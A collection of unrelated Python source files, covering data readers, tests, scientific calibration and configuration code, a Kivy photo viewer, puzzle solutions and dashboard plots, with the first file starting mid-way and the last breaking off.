"""Return a new class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
return NavigableDictIterator(iter(self._explain),
mapper=lambda record: {record[0]: record[1]}
)
class SRURecordReader(object):
"""The :class:`~polymatheia.data.reader.SRURecordReader` is an iteration container for Records fetched via SRU.
The underlying library (SRUpy) automatically handles the continuation parameters, allowing for simple iteration.
"""
def __init__(self, url, query, max_records=None, record_schema="dc", **kwargs):
"""Construct a new :class:`~polymatheia.data.reader.SRURecordReader`.
:param url: The base URL of the SRU endpoint
:type url: ``str``
:param query: The query string
:type query: ``str``
:param max_records: The maximum number of records to return
:type max_records: ``int``
:param record_schema: Schema in which records will be returned. Defaults to Dublin Core schema.
:type record_schema: ``str``
:param kwargs: Additional request parameters that will be sent to the SRU server
"""
self._url = url
self._query = query
self._max_records = max_records
self._record_schema = record_schema
self._kwargs = kwargs
self.record_count = None
self.echo = None
def __iter__(self):
"""Return a new class:`~polymatheia.data.NavigableDictIterator` as the iterator."""
sru_records = SRUpy(self._url).get_records(query=self._query,
maximumRecords=self._max_records,
recordSchema=self._record_schema,
**self._kwargs)
self.record_count = sru_records.number_of_records
if sru_records.echo:
self.echo = NavigableDict(sru_records.echo)
return NavigableDictIterator(sru_records,
mapper=lambda record: xml_to_navigable_dict(
etree.fromstring(
record.raw,
parser=etree.XMLParser(remove_comments=True)
)
))
@staticmethod
def result_count(url, query):
"""Return result count for the given query.
:param url: The base URL of the SRU endpoint
:type url: ``str``
:param query: The query string
:type query: ``str``
"""
return SRUpy(url).get_records(query=query, maximumRecords=1).number_of_records
|
import os
import tempfile
import numpy as np
import tensorflow as tf
from absl.testing import parameterized
from kblocks.data import cache, snapshot
from kblocks.data.cache import save_load_cache, tfrecords_cache
os.environ["TF_DETERMINISTIC_OPS"] = "1"
def as_array(dataset: tf.data.Dataset) -> np.ndarray:
return np.array([el.numpy() for el in dataset])
lazy_factories = (
cache,
snapshot,
)
eager_factories = (
tfrecords_cache,
save_load_cache,
)
factories = lazy_factories + eager_factories
class CacheTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.parameters(*factories)
def test_cache_transform(self, factory):
seed = 0
epoch_length = 5
rng = tf.random.Generator.from_seed(seed)
dataset = tf.data.Dataset.range(epoch_length).map(
lambda x: tf.cast(x, tf.float32) + rng.uniform(())
)
expected = as_array(dataset)
state = rng.state.numpy()
assert np.all(expected != as_array(dataset))
rng.reset_from_seed(seed)
with tempfile.TemporaryDirectory() as tmp_dir:
cached = dataset.apply(factory(tmp_dir))
np.testing.assert_equal(cached.cardinality().numpy(), epoch_length)
for _ in range(2):
np.testing.assert_equal(as_array(cached), expected)
np.testing.assert_equal(rng.state.numpy(), state)
if __name__ == "__main__":
tf.test.main()
|
from model.details import Details
import random
from model.group import Group
from fixture.orm import ORMFixture
dba = ORMFixture(host="127.0.0.1", name="addressbook", user="root", password="")
def test_add_contact_to_group(app, db):
if len(db.get_contact_list()) == 0:
app.contact.create(Details(firstname="firstname", middlename="middlename", lastname="test", nickname="test"))
old_contacts = db.get_contact_list()
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
contact = random.choice(old_contacts)
group_list = db.get_group_list()
group = random.choice(group_list)
app.contact.add_contact_to_group(contact.id, group.id)
new_group_list = list(dba.get_contacts_in_group(Group(id=group.id)))
assert contact in new_group_list
|
#Exercício Python 32: Faça um programa que leia um ano qualquer e mostre se ele é bissexto.
from datetime import date
ano = int(input('Informe um ano para descobrir se é BISSEXTO, caso queira tester o ano atual digite 0: '))
if ano == 0:
ano = date.today().year
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print(f'O ano {ano} é BISSEXTO')
else:
print(f'O ano {ano} NÃO é BISSEXTO') |
#!/usr/bin/env python
# Programmer(s): Sopan Patil.
# This file is part of the 'hydroutils' package.
import numpy
import copy
######################################################################
class Calibration(object):
""" The 'Calibration' class contains the following two methods for model calibration:
(1) Particle Swarm Optimisation
(2) Monte-Carlo Optimisation
"""
@staticmethod
def pso_maximise(model, params, obsdata, objf, calperiods_obs, calperiods_sim):
""" This method optimises a user provided model by maximising the user provided
objective function with the Particle Swarm Optimisation algorithm.
Args:
(1) model: Instance of the user provided model. The class file of user's model MUST
contain a method called 'simulate' which is used to run the model.
(2) params: List of the instances of user provided model parameter sets.
(3) obsdata: Time-series of the observed data (that will be compared with simulated data).
(4) objf: Method from the ObjectiveFunction class specifying the objective function.
(5) calperiods_obs: Two element array (or list) specifying the index values of the start
and end data points of calibration period for the observed data.
(6) calperiods_sim: Two element array (or list) specifying the index values of the start
and end data points of calibration period for the simulated data.
"""
# PSO algorithm parameters
npart = len(params) # No. of particles in a PSO swarm
niter = 50 # Maximum number of swarm iterations allowed
ertol = 1e-3 # Error tolerance for considering no optimisation improvement
maxiter = 5 # Maximum swarm iterations allowed with no optimisation improvement
nstp = 0
winit = 0.9
wend = 0.4
w = winit
objmax = numpy.zeros(niter)
paramsbst = copy.deepcopy(params)
paramsmax = params[0]
# Start PSO
for j in range(niter):
for i in range(npart):
# Simulate the model
simdata = model.simulate(params[i])
# Calculate the objective function value of simulation
params[i].objval = objf(obsdata[calperiods_obs[0]:calperiods_obs[1]+1],
simdata[calperiods_sim[0]:calperiods_sim[1]+1])
# If the particle has improved upon its own best objective function
if params[i].objval > paramsbst[i].objval:
# copy parameter set
paramsbst[i] = copy.deepcopy(params[i])
# If the particle has improved upon entire swarm's objective function
if params[i].objval > paramsmax.objval:
# copy parameter set
paramsmax = copy.deepcopy(params[i])
# Update the parameter values
params[i].updateparameters(paramsbst[i], paramsmax, w)
objmax[j] = paramsmax.objval
print('Swarm iteration:', j+1, ', Best objfun value:', objmax[j])
if j > 0:
# Count no. of swarm iterations with no objective function value improvement
abser = objmax[j] - objmax[j-1]
if abser < ertol:
nstp += 1
else:
nstp = 0
# Stop the optimisation if maximum swarm iterations have been
# reached without any improvement in the objective function value
if nstp == maxiter:
break
w -= ((winit - wend)/(niter - 1))
return paramsmax
# ----------------------------------------------------------------
@staticmethod
def montecarlo_maximise(model, params, obsdata, objf, calperiods_obs, calperiods_sim):
""" This method optimises a user provided model by maximising the user provided
objective function with the MonteCarlo Optimisation algorithm.
Args:
(1) model: Instance of the user provided model. The class file of user's model MUST
contain a method called 'simulate' which is used to run the model.
(2) params: List of the instances of user provided model parameter sets.
(3) obsdata: Time-series of the observed data (that will be compared with simulated data).
(4) objf: Method from the ObjectiveFunction class specifying the objective function.
(5) calperiods_obs: Two element array (or list) specifying the index values of the start
and end data points of calibration period for the observed data.
(6) calperiods_sim: Two element array (or list) specifying the index values of the start
and end data points of calibration period for the simulated data.
"""
paramsmax = params[0]
niter = len(params) # No. of iterations
# Start Monte-Carlo iterations
for i in range(niter):
# Simulate the model
simdata = model.simulate(params[i])
# Calculate the objective function value of simulation
params[i].objval = objf(obsdata[calperiods_obs[0]:calperiods_obs[1]+1],
simdata[calperiods_sim[0]:calperiods_sim[1]+1])
# If current parameter set has improved upon previous maximum objective function value
if params[i].objval > paramsmax.objval:
# copy parameter set
paramsmax = copy.deepcopy(params[i])
print('Iteration:', i+1, ', Best objfun value:', paramsmax.objval)
return paramsmax
######################################################################
|
"""
Pond Sizes: You have an integer matrix representing a plot of land, where the value at that location
represents the height above sea level. A value of zero indicates water. A pond is a region of water
connected vertically, horizontally, or diagonally. The size of the pond is the total number of
connected water cells. Write a method to compute the sizes of all ponds in the matrix.
EXAMPLE
Input:
0 2 1 0
0 1 0 1
1 1 0 1
0 1 0 1
Output: 2, 4, 1 (in any order)
(16.19, p515)
"""
def _pond_size(land, i, j):
# check index out of bounds and base case: no water here or cell is visited
if i < 0 or j < 0 or i >= len(land) or j >= len(land[0]) or land[i][j] != 0:
return 0
size = 1
land[i][j] = -1 # mark visited
for di in range(-1, 2):
for dj in range(-1, 2):
if di == 0 and dj == 0:
continue
size += _pond_size(
land, i + di, j + dj
) # O(mn) space if all cells have water
return size
def pond_sizes(land):
"""Modified depth-first search. To avoid recounting cells, mark the cell as visited.
O(mn) time and O(mn) space, where m is number of rows and n is number of columns."""
res = []
if len(land) == 0 or len(land[0]) == 0:
return res
rows = len(land)
cols = len(land[0])
for i in range(rows):
for j in range(cols):
if land[i][j] == 0:
size = _pond_size(land, i, j)
res.append(size)
return res
|
"""
SystematicsConfig.py:
Centralization of common systematics configurations.
Original author: J. Wolcott (jwolcott@fnal.gov)
May 2014
"""
import itertools
import math
############################ Config Error Bands ########################
#number of random shifted universes
NUM_UNIVERSE = 100
#number of flux uniberses
USE_NUE_CONSTRAINT = True
AnaNuPDG=14
NUM_FLUX_UNIVERSE = 200 if USE_NUE_CONSTRAINT else 100
# detector mass uncertainty
MASS_UNCERTAINTY = 0.014 # = 1.4% (it's fractional). Laura (Doc7615) says she got this from Ron (Doc6016).
# data EM scale shift in ECAL:
EM_ENERGY_SCALE_SHIFT_ECAL = -0.058 # downward 5.8%
# EM scale uncertainty in ECAL,HCAL, quoted from nu+e paper
EM_ENERGY_SCALE_UNCERTAINTY = {
"ECAL": 0.015,
"HCAL": 0.05
}
BEAM_ANGLE = math.radians(-3.3)
BEAM_XANGLE_UNCERTAINTY = 1*1e-3 #radians
BEAM_YANGLE_UNCERTAINTY = 0.9*1e-3
LEAKAGE_CORRECTION = lambda E: E*0.008
#LEAKAGE_CORRECTION = lambda E: 0
AVAILABLE_E_CORRECTION = 1.17
LEAKAGE_SYSTEMATICS = -10
# electron angle uncertainty
ELECTRON_ANGLE_UNCERTAINTY = 1e-3 # this is muon angular resolution. I am worry about this.
#DEDX_ENERGY_SCALE_UNCERTAINTY = 0.015 # = 1.5% (still fractional). Based on eyeballing the dE/dx distribution for this analysis in the extra energy sideband.
#COHERENT_UNCERTAINTY = 0.2 # = 20% (fractional). Covers the measurement errors and residual difference between GENIE COH and MINERvA's measurement after the reweighting done in tools/Corrections.py
#COHERENT_EB_NAME = "CoherentModel"
#MYSTERY_ALT_EB_NAME = "MysteryProcessModel"
#SIDEBAND_MODEL_EB_NAME = "SidebandModel" # systematic addressing data-MC disagreement in EE sideband at low energy. used in BackgroundFitting.py
# Genie knobs
GENIE_UNIVERSES = [
"AGKYxF1pi",
"AhtBY",
"BhtBY",
"CCQEPauliSupViaKF",
"CV1uBY",
"CV2uBY",
"EtaNCEL",
"FrAbs_N",
"FrAbs_pi",
"FrCEx_N",
"FrCEx_pi",
"FrElas_N",
"FrElas_pi",
"FrInel_N",
#"FrInel_pi",
"FrPiProd_N",
"FrPiProd_pi",
"MFP_N",
"MFP_pi",
#"MaCCQE",
#"MaCCQEshape",
#"NormCCQE", these three are taken care by seperate class
"MaNCEL",
"MaRES",
"MvRES",
"NormCCRES",
"NormDISCC",
"NormNCRES",
"RDecBR1gamma",
#"Rvn1pi",
#"Rvp1pi", these two are taken care by seperate class
"Rvn2pi",
"Rvp2pi",
"Theta_Delta2Npi",
"VecFFCCQEshape"
]
# Two non-standard genie knobs? should revisit in the future
#"efnucr_flat", "EFNUCR",
# minerva tune errorbands
UNIVERSES_2P2H = [1,2,3] #2p2h universe variations
RPA_UNIVERSES = {
"HighQ2":[1,2],
"LowQ2" :[3,4]
}
NonResPi=True
LowQ2PiWeightChannel = None
LowQ2PiWeightSysChannel = ["JOINT","NUPI0"]
NumZExpansionUniverses = 0 #Means Don't use Zexpansion. 100 is default Z expansion
RESPONSE_BRANCHES = [
"p",
"meson",
"em",
"other",
"xtalk",
]
NEUTRON_RESPONSE = False
if NEUTRON_RESPONSE:
RESPONSE_BRANCHES.extend([
"low_neutron",
"mid_neutron",
"high_neutron"
])
GEANT_PARTICLES = [
2212,2112,211
]
# not all the variations are relevant for the PC excess samples
#PC_EXCESS_VARIATIONS = VARIATIONS[:]
#PC_EXCESS_VARIATIONS.remove("BirksUp")
#PC_EXCESS_VARIATIONS.remove("BirksDown")
#PC_EXCESS_VARIATIONS.remove("MichelEScaleUp")
#PC_EXCESS_VARIATIONS.remove("MichelEScaleDown")
#PC_EXCESS_VARIATIONS.remove("GENIE_EFNUCR-1Sigma")
#PC_EXCESS_VARIATIONS.remove("GENIE_EFNUCR+1Sigma")
# EXTERNAL_ERROR_BANDS = {
# "BirksConstant": ["BirksDown", "BirksUp",],
# "CrossTalk": [ "XtalkSmear", ],
# "EnergyScale": [ "EMEScaleUp", "EMEScaleDown", ],
# "MichelEScale": [ "MichelEScaleUp", "MichelEScaleDown",],
# "dEdXEScale": ["dEdXEScaleUp", "dEdXEScaleDown",],
# "EFNUCR": ["GENIE_EFNUCR-1Sigma", "GENIE_EFNUCR+1Sigma"],
# MYSTERY_ALT_EB_NAME: [MYSTERY_ALT_EB_NAME, ]
# }
# for err_name, err_group in BKND_UNIV_SYSTEMATICS.iteritems():
# # these are constraint err bands, not spectators
# if "flux" in err_name.lower():
# continue
# for err_name in err_group:
# ERROR_CONSTRAINT_STRATEGIES[err_name] = PlotUtils.MnvHistoConstrainer.PRESERVE_FRACTIONAL_ERR
# if USE_GENIE_INDIV_KNOBS:
# BKND_UNIV_SYSTEMATICS["GENIE"] += [
# "truth_genie_wgt_AGKYxF1pi",
# "truth_genie_wgt_AhtBY",
# "truth_genie_wgt_BhtBY",
# "truth_genie_wgt_CCQEPauliSupViaKF",
# "truth_genie_wgt_CV1uBY",
# "truth_genie_wgt_CV2uBY",
# "truth_genie_wgt_EtaNCEL",
# "truth_genie_wgt_FrAbs_N",
# "truth_genie_wgt_FrAbs_pi",
# "truth_genie_wgt_FrCEx_N",
# "truth_genie_wgt_FrCEx_pi",
# "truth_genie_wgt_FrElas_N",
# "truth_genie_wgt_FrElas_pi",
# "truth_genie_wgt_FrInel_N",
# "truth_genie_wgt_FrInel_pi",
# "truth_genie_wgt_FrPiProd_N",
# "truth_genie_wgt_FrPiProd_pi",
# "truth_genie_wgt_MFP_N",
# "truth_genie_wgt_MFP_pi",
# "truth_genie_wgt_MaCCQE",
# "truth_genie_wgt_MaNCEL",
# "truth_genie_wgt_MaRES",
# "truth_genie_wgt_MvRES",
# "truth_genie_wgt_NormDISCC",
# "truth_genie_wgt_RDecBR1gamma",
# "truth_genie_wgt_Rvn1pi",
# "truth_genie_wgt_Rvn2pi",
# "truth_genie_wgt_Rvp1pi",
# "truth_genie_wgt_Rvp2pi",
# "truth_genie_wgt_Theta_Delta2Npi",
# "truth_genie_wgt_VecFFCCQEshape",
# ]
# GENIE_ERROR_GROUPS = {
# #"Elastic": ["NormCCQE", "MaCCQEshape", "MaCCQE", "VecFFCCQEshape", "CCQEPauliSupViaKF", "MaNCEL", "EtaNCEL"],
# #"Resonance": ["NormCCRES", "MaRES", "MvRES", "NormNCRES", "RDecBR1gamma", "Theta_Delta2Npi"],
# #"DIS": ["NormDISCC", "Rvp1pi", "Rvn1pi", "Rvp2pi", "Rvn2pi", "AGKYxF1pi", "AhtBY", "BhtBY", "CV1uBY", "CV2uBY",],
# "Primary interaction" :[
# # Elastic
# "NormCCQE", "MaCCQEshape", "MaCCQE", "VecFFCCQEshape", "CCQEPauliSupViaKF", "MaNCEL", "EtaNCEL",
# # Resonance
# "NormCCRES", "MaRES", "MvRES", "NormNCRES", "RDecBR1gamma", "Theta_Delta2Npi",
# # DIS
# "NormDISCC", "Rvp1pi", "Rvn1pi", "Rvp2pi", "Rvn2pi", "AGKYxF1pi", "AhtBY", "BhtBY", "CV1uBY", "CV2uBY",
# ],
# "FSI model": ["FrAbs_N", "FrAbs_pi", "FrCEx_N", "FrCEx_pi", "FrElas_N", "FrElas_pi", "FrInel_N", "FrInel_pi", "FrPiProd_N", "FrPiProd_pi", "MFP_N", "MFP_pi",],
# #"efnucr_flat", "EFNUCR"],
# }
# OTHER_INTERACTION_ERROR_GROUPS = {
# "Sideband model": ["BackgroundFit", "SidebandModel" ],
# "Coherent": ["CoherentModel",],
# "Excess process model": ["MysteryProcessModel",],
# }
# DETECTOR_RESPONSE_ERROR_GROUPS = {
# "Angular resolution": ["ElectronAngle", "theta_bias", "theta_smear"],
# "EM energy scale": ["EnergyScale", "dEdXEScale"],
# "Birks's constant": ["BirksConstant", "birks_constant_flat"],
# "Cross-talk": ["CrossTalk", "xtalk_alt"],
# "Global energy scale": ["meu",],
# "Hadron response": ["pion_response", "proton_response", "other_response", "neutron_pathlength"],
# "Michel electron energy scale": ["MichelEScale",],
# "MINOS": ["minos_overlap",],
# "Muon energy scale": ["muon_energy_scale", ],
# "Target mass": ["Mass", "target_mass"],
# "Timing": ["WideTimeWindow",],
# "Reconstruction": ["no_isoblobs_cut", "rock_subtraction", "tracking_efficiency", "unfolding", "vertex_smear"],
# }
################################# Error summary plot config ############################
DETECTOR_RESPONSE_ERROR_GROUPS = {
"Angular resolution": ["eltheta",],
"Beam Angle": ["beam_angle",],
"EM energy scale": ["elE_ECAL","elE_HCAL"],
"Birk's Constant" : ["birks"],
"Particle Response":["response_"+i for i in RESPONSE_BRANCHES]
}
MINERVA_TUNNING_ERROR_GROUPS = {
"RPA" : ["RPA_"+i for i in RPA_UNIVERSES],
"Low Recoil 2p2h Tune" : ["Low_Recoil_2p2h_Tune"],
#"Low Q2 Pion": ["LowQ2Pi"],
}
GENIE_ERROR_GROUPS = {
"GENIE" : ["GENIE_"+ i for i in (GENIE_UNIVERSES+["MaCCQE", "Rvn1pi", "Rvp1pi"] ) if not i.startswith("Fr") ]
}
FSI_ERROR_GROUPS = {
"GENIE-FSI" : ["GENIE_"+ i for i in GENIE_UNIVERSES if i.startswith("Fr") ]
}
GEANT_ERROR_GROUPS = {
"GEANT" : ["GEANT_" +i for i in ("Neutron","Pion","Proton")]
}
CONSOLIDATED_ERROR_GROUPS_CONFIG = {
"Detector model": [DETECTOR_RESPONSE_ERROR_GROUPS,GEANT_ERROR_GROUPS],
"Interaction model": [GENIE_ERROR_GROUPS],
"FSI": [FSI_ERROR_GROUPS],
"MnvTunes" :[MINERVA_TUNNING_ERROR_GROUPS],
}
CONSOLIDATED_ERROR_GROUPS = {
key:[e for group in CONSOLIDATED_ERROR_GROUPS_CONFIG[key] for e in itertools.chain.from_iterable(iter(group.values()))] for key in CONSOLIDATED_ERROR_GROUPS_CONFIG
}
DETAILED_ERROR_GROUPS = DETECTOR_RESPONSE_ERROR_GROUPS.copy()
DETAILED_ERROR_GROUPS.update(GENIE_ERROR_GROUPS)
DETAILED_ERROR_GROUPS.update(GEANT_ERROR_GROUPS)
DETAILED_ERROR_GROUPS.update(MINERVA_TUNNING_ERROR_GROUPS)
# ERROR_SUBGROUPS = {
# "Detector model": DETECTOR_RESPONSE_ERROR_GROUPS,
# "Flux model": FLUX_ERROR_GROUPS,
# "Interaction model": dict(GENIE_ERROR_GROUPS.items() + OTHER_INTERACTION_ERROR_GROUPS.items()),
# }
# systematics from universes generated from external calculations
# (e.g., dedicated variation samples).
# these should be in the form of histogram(s) in the same binning
# as the CV histogram, stored in a file somewhere
# EXTERNAL_UNIV_CONFIG = {
# "BkndShape": {
# "err_band_type": PlotUtils.MnvVertErrorBand,
# "histo_file": os.path.join( AnalysisConfig.PlotPath("BackgroundFitting"), AnalysisConfig.bknd_constraint_method, "background_prediction_histos.root" ),
# "histo_names": ["mc_bknd_pred",]
# },
# }
# DEFAULT_VERT_SYSTEMATICS = BKND_UNIV_SYSTEMATICS.copy()
# ########################
# def GroupErrors(plotter, grouping=CONSOLIDATED_ERROR_GROUPS):
# Vector_string_type = getattr(ROOT, "vector<string>")
# # so.......... I can't seem to get genreflex
# # to create the proper dictionaries to allow me
# # to interrogate the error_summary_group_map for its list of keys.
# # thus I will store them separately.
# if not hasattr(plotter, "error_group_list"):
# plotter.error_group_list = []
# # for prefix, grouping in zip( ("truth_genie_wgt", "mc_wgt_Flux"), (GENIE_ERROR_GROUPS, FLUX_ERROR_GROUP) ):
# for group_name, error_list in grouping.iteritems():
# vector = Vector_string_type()
# for error_name in error_list:
# vector.push_back(error_name)
# plotter.error_summary_group_map[group_name] = vector
# plotter.error_group_list.append(group_name)
# # make an MnvPlotter that has the right error groups
# plotter = PlotUtils.MnvPlotter()
# GroupErrors(plotter)
# plotter.text_size = 0.03
# #plotter.legend_n_columns = 2
# plotter.legend_offset_x = 0.02
# plotter.legend_text_size = 0.03
# plotter.height_nspaces_per_hist = 1
# plotter.width_xspace_per_letter = 0.3
# plotter.legend_offset_y = -0.1
# # also make an MnvHistoConstrainer with the right error strategies
# constrainer = PlotUtils.MnvHistoConstrainer()
# constrainer.LoadConstraint("nu+e", os.path.expandvars("$MPARAMFILESROOT/data/FluxConstraints/nu+e.txt"))
# for err_name, strategy in ERROR_CONSTRAINT_STRATEGIES.iteritems():
# constrainer.SetSpectatorCorrectionStrategy(err_name, strategy)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2017 Judit Acs <judit@sch.bme.hu>
#
# Distributed under terms of the MIT license.
from argparse import ArgumentParser
from sys import stdin
from morph_seg.sequence_tagger.inference import Inference
class MLPInference(Inference):
def print_segmentation(self):
for i, sample in enumerate(self.dataset.samples):
out = []
offset = len(self.decoded[i]) - len(sample)
for j, s in enumerate(sample):
if self.decoded[i][j+offset] == '_':
out.append(' ')
elif self.decoded[i][j+offset] == 'M':
out.append("\\\\")
out.append(s)
print(''.join(out).strip())
def parse_args():
p = ArgumentParser()
p.add_argument('--model-dir', type=str, required=True,
help="Location of model and parameter files")
return p.parse_args()
def main():
args = parse_args()
inf = MLPInference(args.model_dir, stdin)
inf.run_inference()
inf.print_segmentation()
if __name__ == '__main__':
main()
|
import sys
import os
import kivy
from kivy.app import App
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.graphics import Rectangle, Color
from kivy.properties import ObjectProperty
from kivy.core.window import Window
from exifData import Exifdata
from config import Config
from photoList import PhotoList
from util import transposeImage
class MainWidget(BoxLayout):
""" The main/root widget for the ExifPhotos. The UI is defined in .kv file """
def __init__(self, config):
super(MainWidget, self).__init__()
self.config = config
# load tag mappings defined in config
self.exifdata = Exifdata()
mappingFileList = config.getOrAdd('TagMappingFiles', 'StdTagMapping.txt').split(',')
for item in mappingFileList:
self.exifdata.addMapping(item.strip())
# load display tags
self.displayTags = []
tags = config.getOrAdd('DisplayTags', 'Image Width, Image Height, Date Taken').split(',')
for item in tags:
self.displayTags.append(item.strip())
# get display config
self.overrideGridFontSize = config.getOrAddBool('OverrideGridFontSize', False)
if self.overrideGridFontSize:
self.gridFontSize = config.getOrAddInt('GridFontSize', 36)
self.showFullFilePath = config.getOrAddBool('ShowFullFilePath', True)
# create PhotoList with starting folder
self.defaultFolder = config.getOrAdd('DefaultFolder', '')
self.includeSubfolder = config.getOrAddBool('IncludeSubfolder', False)
self.photos = PhotoList()
self.openFolder(self.defaultFolder)
def openDialog(self):
""" popup dialog to select folder """
content = FolderPickerDialog(self)
content.ids.filechooser.path=self.photos.folder
if Window.width > Window.height:
sizehint=(0.6, 0.8)
else:
sizehint=(0.8, 0.6)
self._popup = Popup(title="Folder Picker", content=content, auto_dismiss=False, size_hint=sizehint)
self._popup.open()
pass
def dismissDialog(self):
""" dismiss the pop up dialog """
self._popup.dismiss()
def openFolder(self, folder):
""" populate all files from the folder and display the first file """
self.photos.openFolder(folder, self.includeSubfolder)
self.displayFile(self.photos.currentPhoto())
def displayFile(self, filePath):
""" display file's name, image, and exif data """
if filePath is not None:
self.displayExifGrid(filePath)
if self.showFullFilePath:
self.ids.ImageLabel.text = filePath
else:
self.ids.ImageLabel.text = os.path.basename(filePath)
if 'PhotoIndex' in self.ids:
self.ids.PhotoIndex.text = '%i' %(self.photos.index+1)
self.ids.PhotoCountLabel.text = '%i' %(len(self.photos.photos))
# if orientation is not normal then transpose the image in a temporary file
srcPath = transposeImage(filePath, self.exifdata)
self.ids.PhotoImage.source = srcPath
if not srcPath == filePath:
# reload from the temp file since it's the same file and will be cached by Image
self.ids.PhotoImage.reload()
def nextPhoto(self):
""" move to next photo if available """
self.displayFile(self.photos.next())
def prevPhoto(self):
""" move to prev photo if available """
self.displayFile(self.photos.prev())
def goto(self, number):
""" move to specified number (index + 1). move to the last photo if number is < 1 or > max """
self.displayFile(self.photos.goto(int(number)-1))
def displayExifGrid(self, filePath):
""" display exif data """
self.exifdata.getExifdata(filePath)
grid = self.ids.exifGrid
grid.clear_widgets()
for key in self.displayTags:
if self.exifdata.hasKey(key):
self.displayTag(key, self.exifdata.getValue(key))
def displayTag(self, name, value):
grid = self.ids.exifGrid
keylabel = Label(text=str(name))
grid.add_widget(keylabel)
vallabel = Label(text=str(value))
grid.add_widget(vallabel)
if self.overrideGridFontSize:
keylabel.font_size = self.gridFontSize
vallabel.font_size = self.gridFontSize
#def on_touch_down(self, touch):
# print(touch)
class FolderPickerDialog(FloatLayout):
def __init__(self, mainWidget):
super(FolderPickerDialog,self).__init__()
self.mainWidget = mainWidget
def cancel(self):
self.mainWidget.dismissDialog()
def open(self, path):
self.mainWidget.dismissDialog()
self.mainWidget.openFolder(path)
# Kivy App
class exifMainApp(App):
def __init__(self, config):
super(exifMainApp,self).__init__()
self.exifConfig = config
def build(self):
# return a MainWidget() as a root widget
self.mainWidget = MainWidget(self.exifConfig)
return self.mainWidget
if __name__ == '__main__':
configFile='exifMainConfig.txt'
if len(sys.argv) > 1:
configFile = sys.argv[1]
# apply config settings
config = Config(configFile, autoSave = False)
if config.getOrAddBool('Window.fullscreen', False):
Window.fullscreen = True
else:
Window.size = (config.getOrAddInt('Window.width', 1600), config.getOrAddInt('Window.height', 1000))
Window.top = config.getOrAddInt('Window.top', 40)
Window.left = config.getOrAddInt('Window.left', 100)
app = exifMainApp(config)
app.run()
|
# Question: https://projecteuler.net/problem=190
"""
We have x1, x2, ..., xm > 0.
So, utilizing the AM-GM inquality,
x1 * (x2)^2 * (x3)^3 * ... * (xm)^m
= x1 * [(1/2)(x2)]^2 * [(1/3)(x3)]^3 * ... * [(1/m)(xm)^m] * product{i=1..m}(i^i)
(AM-GM) <= (m / (m(m+1)/2))^(m(m+1)/2) * product{i=1..m}(i^i)
= (2/(m+1))^(m(m+1)/2) * product{i=1..m}(i^i)
'=' occurs when x1 = (1/2)*x2 = (1/3)*x3 = ... = (1/m)*xm
In other words, x2 = 2*x1, x3 = 3*x1, ..., xm = m*x1.
"""
N = 15
ans = 0
product_i_i = 1
for m in range(2, N+1):
product_i_i = product_i_i * (m**m)
Pm = product_i_i * (2/(m+1))**(m*(m+1)//2)
ans = ans + int(Pm)
print(ans)
|
from __future__ import print_function, unicode_literals, absolute_import
import glob, sys
success = False
in_ironpython = "IronPython" in sys.version
if in_ironpython:
try:
from .ironpython_console import *
success = True
except ImportError:
raise
elif sys.platform.startswith('linux') or sys.platform=='darwin':
try:
from .ansi_console import *
success = True
except ImportError, x:
raise
else:
try:
from .console import *
success = True
except ImportError:
pass
raise
if not success:
raise ImportError(
"Could not find a console implementation for your platform")
|
"""Rendering setup"""
from os.path import abspath
from injectool import add_singleton, add_resolver, SingletonResolver
from pyviews.rendering.pipeline import RenderingPipeline
def use_rendering():
"""setup rendering dependencies"""
add_singleton('views_folder', abspath('views'))
add_singleton('view_ext', 'xml')
add_resolver(RenderingPipeline, SingletonResolver())
|
from abc import ABC, abstractmethod
from datetime import datetime
import ipywidgets as widgets
import plotly.graph_objs as go
class DashPlot(ABC):
@abstractmethod
def __init__(self):
super().__init__()
self.widget = go.FigureWidget()
self.dataFunction = None
self.name = None
@abstractmethod
def plot(self):
raise NotImplementedError
class JobStatusesDashPlot(DashPlot):
def __init__(self, melissaMonitoring):
super().__init__()
self.name = 'Job statuses'
self.dataFunction = melissaMonitoring.getJobStatusData
self.widget.add_pie()
self.widget.data[0].textinfo = 'label+percent'
self.widget.data[0].hoverinfo = 'label+percent+value'
self.widget.layout.title.text = 'Jobs statuses'
def plot(self):
self.data = self.dataFunction()
self.widget.data[0].labels = list(self.data.keys())
self.widget.data[0].values = list(self.data.values())
class CoreUsageDashPlot(DashPlot):
def __init__(self, melissaMonitoring):
super().__init__()
self.name = 'Cores usage'
self.dataFunction = melissaMonitoring.spawner.getTotalCPUCount
self.data = []
self.time = []
self.melissaMonitoring = melissaMonitoring
self.widget.add_scatter(name="Cores used")
self.widget.layout.autosize = True
self.widget.layout.showlegend = True
self.widget.layout.xaxis.rangeslider.visible = True
self.widget.layout.title.text = 'Core usage'
self.widget.layout.xaxis.title.text = 'Time elapsed'
self.widget.layout.yaxis.title.text = '# of cores'
self.widget.layout.xaxis.tick0 = 0
self.widget.layout.yaxis.tick0 = 0
self.widget.layout.hovermode = 'x'
def plot(self):
self.data.append(self.dataFunction(self.melissaMonitoring.getJobsIDs()))
self.time.append(datetime.now())
self.widget.data[0].x = self.time
self.widget.data[0].y = self.data
class SobolConfidenceIntervalDashPlot(DashPlot):
def __init__(self, melissaMonitoring):
super().__init__()
self.name = 'Sobol confidence interval'
self.dataFunction = melissaMonitoring.getSobolConfidenceInterval
self.data = {}
self.widget.add_scatter(name="Confidence interval")
self.widget.layout.autosize = True
self.widget.layout.showlegend = True
self.widget.layout.xaxis.rangeslider.visible = True
self.widget.layout.title.text = 'Sobol confidence interval'
self.widget.layout.xaxis.title.text = 'Time elapsed'
self.widget.layout.yaxis.title.text = 'Confidence value'
self.widget.layout.xaxis.tick0 = 0
self.widget.layout.yaxis.tick0 = 1
self.widget.layout.hovermode = 'x'
def plot(self):
interval = self.dataFunction()
if interval is not None:
self.data[datetime.now()] = interval
self.widget.data[0].x = list(self.data.keys())
self.widget.data[0].y = list(self.data.values())
|
#!/usr/bin/env python
import argparse
import sys
from secureboot import which
"""
This function will print input message and exit.
"""
def Exit(inMsg):
print inMsg
sys.exit(1)
"""
